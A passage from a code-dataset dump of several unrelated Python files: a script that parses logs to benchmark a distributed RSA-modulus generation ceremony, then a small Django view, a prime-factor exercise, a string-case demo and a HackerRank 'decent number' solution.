# 07:41:24.961 No candidates found.
passive = re.compile('(Found . valid moduli)|(No candidates found)')
# 21:12:23.981 Verified all proofs; ceremony successful.
allver = re.compile('Verified all proofs')
# 21:06:03.498 MessageType: PUBLIC_KEY_A_VALUE message size: 11010105 bytes
msgtype = re.compile('MessageType: ([A-Z\_]+) message size: ([0-9]+) bytes')
memory = re.compile('Peak Memory = ([0-9]+) Kb')
# 21:26:08.706 Verifying modulus idx:0
vstart = re.compile('Verifying modulus idx:([0-9]+)')
vend = re.compile('Verification for modulus idx:[0-9]+ succeeded')
sendproof = re.compile('Send Proof for Modulus ([0-9]+)')
# MSGS should occur in this order. Todo: check for this in each log
msg_list = [
'PROTOCOL_CONFIG',
'PUBLIC_KEY_A_VALUE',
'PUBLIC_KEY_B_VALUE',
'ASSIGNMENT_PN',
'ENCRYPTED_X_VALUE',
'ENCRYPTED_XY_PLUS_Z_VALUE',
'PS_SIEVING_FLAGS',
'AX_BY_VALUE',
'MODULUS_CANDIDATE',
'POST_SIEVE',
'GAMMA_SHARES',
'GAMMA_RANDOM_SEED_VALUE',
'DISCARD_FLAGS',
'GCD_RAND_SHARES',
'AX_BY_VALUE',
'DISCARD_FLAGS',
'FOUND_MODULI',
]
active_list = [
'GATHER_PUBLIC_DATA',
'GATHER_PROOF_0',
'GATHER_PROOF_1',
'GATHER_PROOF_2',
'GATHER_PROOF_3',
'GATHER_PROOF_4',
'GATHER_PROOF_5',
'GATHER_PROOF_6',
'GATHER_PROOF_7',
'GATHER_PROOF_8',
'GATHER_PROOF_9',
'GATHER_PROOF_10',
'GATHER_PROOF_11',
'GATHER_PROOF_12',
'GATHER_PROOF_13',
'GATHER_PROOF_14',
'GATHER_PROOF_15',
'GATHER_PROOF_16',
'GATHER_PROOF_17',
'GATHER_PROOF_18',
'GATHER_PROOF_19',
'GATHER_PROOF_20',
]
party_msg_list = [
#'ID_PARTY',
'PUBLIC_KEY_A_SHARES',
'PUBLIC_KEY_B_SHARES',
'ENCRYPTED_X_SHARES',
'ENCRYPTED_XY_PLUS_Z_SHARES',
'PARTIAL_XY_MINUS_Z_SHARES',
'AX_BY_SHARES',
'AXB_MINUS_BYA_SHARES',
'MUTHU_ACK',
'GAMMA_RANDOM_SEED_SHARES',
'EXPONENTIATED_GAMMA_VALUE',
'GCD_AX_BY_SHARES',
'AXB_MINUS_BYA_SHARES'
]
class Experiment:
def __init__(self, name):
self.name = name
self.registration = []
self.party_registration = []
self.passive = []
self.active = []
self.overall = []
self.msg_ts = {}
self.msg_sz = {}
self.party_msg_ts = {}
self.party_msg_sz = {}
self.memory = []
self.vidle = {} # verifier idle times
self.vwork = {} # verifier work times
def summary(self):
print(self.name + ' ' + str(len(self.registration)) + ' runs')
print(f' registration: {mean(self.registration):.2f}')
print(f'p registration: {mean(self.party_registration):.2f}')
print(f' passive: {self.avg_passive():.2f}')
print(f' active: {self.avg_active():.2f}')
for m in msg_list:
print(f' {m.rjust(26)} C: {self.avg_msg(m):.2f}')
for m in party_msg_list:
print(f' {m.rjust(26)} P: {self.avg_party_msg(m):.2f}')
# for m in active_list:
# print(f' {m.rjust(26)} C: {mean(self.msg_ts[m]):.2f}')
# for m in active_list[1:]:
# print(f' {m.rjust(26)} P: {mean(self.party_msg_ts[m]):.2f}')
def avg_passive(self):
return mean(self.passive)
def std_passive(self):
if len(self.passive)>1:
return stdev(self.passive)
else:
return 0
def avg_active(self):
if len(self.active) > 0:
return mean(self.active)
else:
return -1
def std_active(self):
if len(self.active) > 1:
return stdev(self.active)
else:
return -1
def avg_reg(self):
return mean(self.registration)
def avg_mem(self):
if len(self.memory) > 0:
return mean(self.memory)
else:
return -1
def avg_msg(self, msg):
if msg in self.msg_ts.keys() and len(self.msg_ts[msg]) > 0:
return mean(self.msg_ts[msg])
else:
return -1
def avg_party_msg(self, msg):
if msg in self.party_msg_ts.keys() and len(self.party_msg_ts[msg]) > 0:
return mean(self.party_msg_ts[msg])
else:
return -1
def avg_msg_sz(self, msg):
if msg in self.msg_sz.keys() and len(self.msg_sz[msg]) > 0:
return mean(self.msg_sz[msg])
else:
return -1
def std_msg_sz(self, msg):
if msg in self.msg_sz.keys() and len(self.msg_sz[msg]) > 0:
return stdev(self.msg_sz[msg])
else:
return 0
def avg_party_msg_sz(self, msg):
if msg in self.party_msg_sz.keys() and len(self.party_msg_sz[msg]) > 0:
return mean(self.party_msg_sz[msg])
else:
return -1
def std_party_msg_sz(self, msg):
if msg in self.party_msg_sz.keys() and len(self.party_msg_sz[msg]) > 0:
return stdev(self.party_msg_sz[msg])
else:
return 0
def std_party_msg(self, msg):
if msg in self.party_msg_ts.keys() and len(self.party_msg_ts[msg]) > 0:
return stdev(self.party_msg_ts[msg])
else:
return -1
def avg_vidle(self, idx):
if len(self.vidle) > 0:
return mean(self.vidle[idx])
else:
return -1
def avg_vwork(self, idx):
if len(self.vwork) > 0:
return mean(self.vwork[idx])
else:
return -1
def std_vidle(self, idx):
if len(self.vidle) > 0:
return stdev(self.vidle[idx])
else:
return -1
def std_vwork(self, idx):
if len(self.vwork) > 0:
return stdev(self.vwork[idx])
else:
return -1
def ts(line):
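    # Convert an HH:MM:SS.mmm timestamp at the start of a log line into
    # integer milliseconds since midnight; returns 0 when there is no match.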
m = logts.match(line)
ts = 0
if m:
ts = int(m.group(1))*60*60*1000 + int(m.group(2))*60*1000 + int(m.group(3))*1000 + int(m.group(4))
return ts
def coordinator_parser(rp, exp):
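    # Walk the coordinator log once, recording registration time, passive and
    # active phase durations, per-message latencies and sizes, and per-proof
    # gather times (GATHER_PROOF_i) into the Experiment accumulators.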
filepath = rp + '/coordinator.log'
cnt = 0
with open(filepath) as fp:
line = fp.readline()
start = ts(line)
prot_start = start
last_sent_msg = start
gp = 0
tt = 0
idx = 0
gp_time = 0
while line:
#print("Line {}: {}".format(cnt, line.strip()))
t = ts(line)
m = reg.search(line)
if m:
print(' ' + str(t-start) + ' registration')
exp.registration.append(t-start)
prot_start = t
last_sent_msg = prot_start
print(f' setting prot_start {prot_start}')
m = passive.search(line)
if m:
print(f' {(t-prot_start)} passive done. sum:{tt}')
exp.passive.append(t-prot_start)
gp_start = t
m = allver.search(line)
if m:
print(' ' + str(t-prot_start) + ' all done')
exp.active.append(t-prot_start)
m = msgtype.search(line)
if m:
key = m.group(1)
if key == "GATHER_PROOFS":
gp = gp + 1
key = "GATHER_PROOF_" + str(gp)
# print(' ' + str(t-last_sent_msg) + ' ' + key + ' ' + m.group(2))
exp.msg_sz.setdefault(key, []).append(int(m.group(2)))
# handle proof timing below
if m.group(1) != "GATHER_PROOFS":
exp.msg_ts.setdefault(key, []).append(t-last_sent_msg)
tt += (t-last_sent_msg)
last_sent_msg = t
# gather proofs are sent in batches of n to verifiers in order.
m = sendproof.search(line)
if m:
nidx = int(m.group(1))
if nidx > idx: # moving on to next proof
key = "GATHER_PROOF_" + str(idx)
exp.msg_ts.setdefault(key, []).append(t-gp_start)
gp_start = t
idx = nidx
m = s1a.search(line)
if m:
dur = int(m.group(3))*60*1000 + int(m.group(4))*1000 + int(m.group(5))/1000
# print(' ' + str(t-prot_start) + ' Overall: ' + m.group(1) + ' ' + m.group(2) + ' ' + str(dur))
exp.overall.append(dur)
#print(str(t) + "\n")
# m = s1a.match(line)
# if m:
# print(line)
# print(m.group(1) + ' ' + m.group(2) )
line = fp.readline()
cnt += 1
def party_parser(rp, exp):
cnt = 0
for f in glob.iglob(rp+'/party_full_protocol_*.log'):
cnt = cnt + 1
# print(' ' + f)
with open(f) as fp:
line = fp.readline()
start = ts(line)
last_sent_msg = start
gp = 0 # the GATHER_PROOF counter, since we want to separate by party
while line:
t = ts(line)
# reset start as soon as reg is done
m = preg.search(line)
if m:
exp.party_registration.append(t-start)
start = t
last_sent_msg = t
## parsing msgtype so far
m = msgtype.search(line)
if m:
key = m.group(1)
if key == "GATHER_PROOFS":
key = "GATHER_PROOF_" + str(gp)
gp = gp + 1
# print(' ' + str(t-last_sent_msg) + ' ' + key + ' ' + m.group(2))
exp.party_msg_ts.setdefault(key, []).append(t-last_sent_msg)
exp.party_msg_sz.setdefault(key, []).append(int(m.group(2)))
last_sent_msg = t
m = memory.search(line)
if m:
exp.memory.append(int(m.group(1)))
line = fp.readline()
print(f' parsed {cnt} party log files')
def verifier_parser(rp, exp):
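    # Extract per-modulus verifier timing: the span between "Verifying modulus"
    # and its "succeeded" line counts as work; the gap since the previous
    # modulus finished counts as idle.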
for f in glob.iglob(rp+'/distributed_verifier*.log'):
with open(f) as fp:
line = fp.readline()
last_start = ts(line)
last_end = last_start
idx = 0 # idx we are trying to verify next
while line:
t = ts(line)
m = vstart.search(line)
if m:
last_start = ts(line)
if idx > 0:
idle = t-last_end
# print(f' idle {idle} {line}')
exp.vidle.setdefault(idx,[]).append(idle)
m = vend.search(line)
if m:
vtime = t-last_start
exp.vwork.setdefault(idx,[]).append(vtime)
idx = idx+1
last_end = t
# print(f' work {vtime} {line}')
line = fp.readline()
dirs = [ "2", "5", "10", "20", "50", "100", ]#"200", "500", "1000", "2000", "4046" ]
maindir = './data/03-04-20/'
experiments = {}
for d in dirs:
cnt = 1
exp = Experiment(d)
experiments[d] = exp
while True:
rp = maindir + d + '/run' + str(cnt)
if path.exists(rp):
print('Parsing %s' % rp)
coordinator_parser(rp, exp)
party_parser(rp, exp)
verifier_parser(rp, exp)
else:
break
cnt = cnt + 1
print(' ['+d+'] Done parsing ' + str(cnt-1) + ' runs')
exp.summary()
# make the summary tables of passive/active total time
print(f'#n passive active reg')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)} & {e.avg_passive()/1000:.1f} {e.std_passive()/1000:.1f} & {e.avg_active()/1000:.1f} {e.std_active()/1000:.1f}& & {e.avg_reg()/1000:.1f}\\\\[2pt] % {len(e.passive)} {len(e.active)} ')
print()
# make the per-message table
print(f'n ', end=' ')
for m in msg_list:
print(f'{m}', end=' ')
print('PASS SUM')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)}', end =" ")
sum = 0
for m in msg_list:
sum += (e.avg_msg(m)/1000)
print(f'{e.avg_msg(m)/1000:5.1f}', end =' ')
print(f'{e.avg_passive()/1000:5.1f} {sum:5.1f}')
########## make the verifier idle/work time
print()
print(f'n work0 idle1 work1 ... (for verifier.txt)')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)} {e.avg_vwork(0)/1000:.1f}', end=' ')
for idx in range(1,21):
print(f'{e.avg_vidle(idx)/1000:.1f} {e.avg_vwork(idx)/1000:.1f}', end=' ')
print()
###### coordinator proof, for m2.txt
print()
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)}', end =" ")
sum = 0
for m in active_list[1:]:
print(f'{e.avg_party_msg(m)/1000:5.2f}', end =' ')
print()
### msg size analysis
sz_list = [
'PUBLIC_KEY_A_VALUE',
'PUBLIC_KEY_B_VALUE',
'ENCRYPTED_X_VALUE',
'ENCRYPTED_XY_PLUS_Z_VALUE',
'PS_SIEVING_FLAGS',
'AX_BY_VALUE',
'MODULUS_CANDIDATE',
'AX_BY_VALUE',
]
print()
for m in sz_list:
print(f'{m}', end=' ')
print('OTHER')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)}', end =" ")
other = e.avg_msg_sz('PROTOCOL_CONFIG') + e.avg_msg_sz('ASSIGNMENT_PN') + e.avg_msg_sz('POST_SIEVE') +e.avg_msg_sz('GAMMA_SHARES') + e.avg_msg_sz('GAMMA_RANDOM_SEED_VALUE') +e.avg_msg_sz('DISCARD_FLAGS') + e.avg_msg_sz('GCD_RAND_SHARES') +e.avg_msg_sz('DISCARD_FLAGS') + e.avg_msg_sz('FOUND_MODULI')
for m in sz_list:
print(f'{e.avg_msg_sz(m):5.1f}', end =' ')
print(f'{other:5.1f}')
# echo "filename,idle,compute" >> $out
# for dataFile in $(ls data/distributed_*)
# do
# idle=`cat $dataFile | grep '6.a. verification' | grep idle | tail -n +2 | awk -F',' '{ print $9 }' | python3 -c "import sys; x=sys.stdin.read().split('\n')[:-1]; print(sum([float(i.split(':')[0]) * 60 + float(i.split(':')[1]) for i in x]))"`
# compute=`cat $dataFile | grep '6.a. verification' | grep compute | awk -F',' '{ print $9 }' | python3 -c "import sys; x=sys.stdin.read().split('\n')[:-1]; print(sum([float(i.split(':')[0]) * 60 + float(i.split(':')[1]) for i in x]))"`
# echo "$dataFile,$idle,$compute" >> $out
# done
| ["[email protected]"] | |
2bc5d18f4cc871157c8bcaf56cb4a04dc1338d76 | 0758ddc73ff870a965ad217d56dcd12d88342172 | classroom/classroomapp/views.py | 033a954b0a7c783f9a7d9f2a881513fff78dfd76 | [] | no_license | konetipavan/POC | 21938393e1d4923b7c866ac2ba67abdebf49b09d | cb37d25adccb5dc2f250a78103a9a4d4a9867cda | refs/heads/master | 2023-08-06T00:01:36.359724 | 2020-09-23T11:25:39 | 2020-09-23T11:25:39 | 297,954,684 | 0 | 0 | null | 2021-09-22T19:35:28 | 2020-09-23T11:56:16 | Python | UTF-8 | Python | false | false | 188 | py |
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def class_room(request):
    return HttpResponse("Welcome to Class Room Application")
| ["[email protected]"] | |
fbe04a89847a36e905a6e4af83f79bc43ca90cda | 21d1e5c00e4597aae8e0e496c2e6c4382e1b66c5 | Peuler3.py | 6beedbba97a636e4f0c02271d5bb562548122e36 | [] | no_license | nishanksp9/Hello | 2fc98435b133795a63569b66a708f822812ed596 | f1a62f074b62f41ae8f695b221cae19309e314f9 | refs/heads/master | 2021-05-10T21:12:32.634280 | 2018-01-20T16:47:23 | 2018-01-20T16:47:23 | 118,221,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 462 | py |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The prime factors of 13195 are 5, 7, 13 and 29.
What is the largest prime factor of the number 600851475143 ?
"""
n = int(input("Enter a number:"))

# Trial division up to sqrt(n), dividing out each factor as it is found, so
# every value printed is a prime factor and the last one is the largest.
# (Testing every i up to n, as before, is far too slow for 600851475143.)
largest = 1
i = 2
while i * i <= n:
    while n % i == 0:
        largest = i
        print(i)
        n //= i
    i += 1
if n > 1:
    largest = n  # the leftover cofactor is itself prime
    print(n)
print("Largest prime factor:", largest)
| ["[email protected]"] | |
a41512cc7687985b9362c8642eeb177b34b65643 | 49301355240895072ab07752986769a8fd94efed | ch02/name_cases.py | d15faab5d1bbc0f16a6dffc393b1732f6e893658 | [] | no_license | patrickbucher/python-crash-course | 507fff579df27df3802defdca9eac4170372e5c1 | fbadfb013ce2dabd71ef642f7e90fb4b8f0df86e | refs/heads/master | 2021-05-23T08:32:05.453001 | 2020-04-05T22:11:42 | 2020-04-05T22:11:42 | 253,200,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py |
name = 'pAtRiCk bUcHeR'
print(name.lower())
print(name.upper())
print(name.title())
| ["[email protected]"] | |
09a6fdd19a950370a84cd3865f9055226f763661 | 1adaa02f6329dee3245059a21aeef42568fb98ce | hackerrank/Greedy/05-sherlockAndTheBeast.py | d7e5d1ca8bb9a4c227217217f1e40a1957983486 | ["MIT"] | permissive | Suraj-Upadhyay/ProblemSolving | 6954c63a10d5bccab1a6d104d8c44459a2a177e1 | 309160f6a2fb43ae7673210b01957ffca9247d0d | refs/heads/master | 2023-01-22T15:38:49.155431 | 2020-11-23T14:56:25 | 2020-11-23T14:56:25 | 287,932,091 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 735 | py |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the decentNumber function below.
def decentNumber(n):
fives = threes = 0
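    # A decent number uses only digits 5 and 3, with the count of 5s divisible
    # by 3 and the count of 3s divisible by 5. Here `fives` counts blocks of
    # three 5s and `threes` blocks of five 3s, so the digit total is
    # 3*fives + 5*threes = n; 5s are placed first to maximize the value.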
if n % 3 == 0:
fives = n // 3
threes = 0
elif n % 3 == 2:
fives = n // 3 - 1
threes = 1
else:
fives = n // 3 - 3
threes = 2
if fives < 0 or threes < 0 or (fives == 0 and threes == 0):
print(-1)
else:
answer = ['5' for i in range(fives * 3)] + ['3' for i in range(threes * 5)]
for x in answer:
print(x, end='')
print()
if __name__ == '__main__':
t = int(input().strip())
for t_itr in range(t):
n = int(input().strip())
decentNumber(n)
| ["[email protected]"] |